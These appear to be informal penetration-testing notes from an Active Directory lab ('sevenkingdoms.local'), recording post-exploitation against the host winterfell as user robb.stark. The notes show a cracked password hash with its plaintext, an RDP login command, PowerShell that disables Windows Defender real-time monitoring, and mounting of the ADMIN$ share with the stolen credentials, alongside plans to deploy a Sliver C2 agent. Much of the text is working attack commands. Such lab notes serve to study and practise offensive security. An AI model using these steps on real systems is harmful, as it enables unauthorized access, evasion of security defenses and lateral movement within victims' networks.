## `robb.stark` - we can use `-x` on [[winterfell]] - RCE - next up, let's go through same steps to deploy a sliver agent on the remote system - do keep in mind that this fucker has windows defender enabled tho... - we can either go disable this through azure - or see if we can bypass it somehow, perhaps just using LOL techniques - Dudes got `R:W` on `ADMIN share on the DC <3 - he's adin, we basically just rooted the freakin thing We crack da hash: ``` 831486ac7f26860c9e2f51ac91e1a07a:sexywolfy ``` We can now RDP onto the host: ``` xfreerdp /u:robb.stark /p:sexywolfy /d:north.sevenkingdoms.local /v:winterfell ``` Host has windows defender enabled, let's disable that: ``` Get-MpPreference | Select-Object -Property DisableRealtimeMonitoring # false Set-MpPreference -DisableRealtimeMonitoring $true Get-MpPreference | Select-Object -Property DisableRealtimeMonitoring # true ``` After that we'll go about downloading an additional sliver payload onto the machine. Mount dat ADMIN$ share: ```sh sudo mount -t cifs //192.168.56.22/ADMIN$ /mnt/winterfell-admin -o username=robb.stark,password=sexywolfy,domain=north.sevenkingdoms.local,vers=4.0 ```